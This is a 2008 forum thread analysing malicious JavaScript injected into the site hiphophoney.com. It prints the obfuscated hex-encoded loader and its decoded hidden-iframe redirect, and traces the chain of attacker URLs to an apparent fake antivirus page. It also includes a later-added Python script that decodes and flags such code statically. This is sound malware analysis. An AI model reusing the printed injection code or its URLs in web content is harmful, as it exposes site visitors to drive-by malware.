Author Topic: hiphophoney.com  (Read 3428 times)


July 29, 2008, 05:24:00 pm

Kayrac

  • Guest
stole this from my writeup at dslreports

Okay so, DO NOT VISIT ANY OF THESE LINKS, even though it appears the final link is already dead

hiphophoney.com is injected with

Code:
<!--
var d=document,kol=561;
function O10H488F179292A39(H488F179293234){  return( parseInt(H488F179293234,16));}function H488F179294A5B(H488F17929522C){  var H488F179295A20='';for(H488F17929621B=0; H488F17929621B<H488F17929522C.length; H488F17929621B+=2){ H488F179295A20 += ( String.fromCharCode (O10H488F179292A39(H488F17929522C.substr(H488F17929621B, 2))));}return H488F179295A20;} document.write(H488F179294A5B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3233343234292B273663385C272077696474683D3631206865696768743D333834207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->

which translates into

Code:
<script>if(!myia){d.write('<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*23424)+'6c8\' width=61 height=384 style=\'display: none\'></IFRAME >');}var myia=true;</script>

this takes you to,
Code:
http://77.221.133.171/.if/go.html?
which is a fake 403 forbidden page
which has this

Code:
<iframe style="position: absolute; top: 10; left: 124; width: 546px; height: 524px; visibility: hidden" frameborder="0" scrolling="no" src="http://77.221.133.171/.dif/go.php?sid=1"></iframe>

SO, we visit that, and it moves up quickly along to

Code:
http://77.221.133.171/.sp/check.cgi?o

which quickly switches into

Code:
http://www.advancedxpdefender.com/sysscan/7805dd4cf47ceee6ef4b9c4f78061493/1/

which is already dead, but it looks like a fake antivirus

:)
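
A static way to reproduce the "translates into" step from the post above without letting the injected script run, as an added example that is not part of the original post: it decodes hex string literals as data and flags hidden iframes in the result. The sample page, its example.invalid URL and all function names are constructed for illustration.

```python
import re

# A quoted string literal made only of hex byte pairs (32+ hex digits).
HEX_LITERAL = re.compile(r"""(['"])((?:[0-9A-Fa-f]{2}){16,})\1""")
URL = re.compile(r"""https?://[^\s'"\\<>]+""")
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def decode_hex_literals(script):
    """Decode each hex literal as data; the script itself is never executed."""
    layers = []
    for match in HEX_LITERAL.finditer(script):
        # String.fromCharCode(0..255) maps one byte to one code point: latin-1.
        layers.append(bytes.fromhex(match.group(2)).decode("latin-1"))
    return layers


def triage(script):
    """Return one finding per decoded layer with the indicators worth logging."""
    findings = []
    for layer in decode_hex_literals(script):
        findings.append({
            "decoded": layer,
            "urls": URL.findall(layer),
            "hidden_iframe": bool(re.search(r"<iframe", layer, re.I)
                                  and HIDDEN.search(layer)),
        })
    return findings


def to_hex(text):
    return text.encode("latin-1").hex().upper()


# Constructed sample (not the page's blob): same shape, reserved .invalid host.
SAMPLE_PAYLOAD = ("<script>d.write('<IFRAME src=\\'http://example.invalid/go.html?'"
                  "+Math.round(Math.random()*9)+'\\' style=\\'display: none\\'>"
                  "</IFRAME>');</script>")
SAMPLE_PAGE = ("<!--\nfunction dec(h){/* hex pairs -> String.fromCharCode */}\n"
               "document.write(dec('" + to_hex(SAMPLE_PAYLOAD) + "'));\n//-->")

if __name__ == "__main__":
    for finding in triage(SAMPLE_PAGE):
        print(finding["urls"], "hidden iframe:", finding["hidden_iframe"])
        print(finding["decoded"])
```
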

July 30, 2008, 12:56:20 pm
Reply #1

sowhat-x

  • Guest
Might have been temporarily "offline"...spotted somewhere back in middle June:
http://www.malwaredomainlist.com/mdl.php?search=77.221.133.171&colsearch=All&quantity=50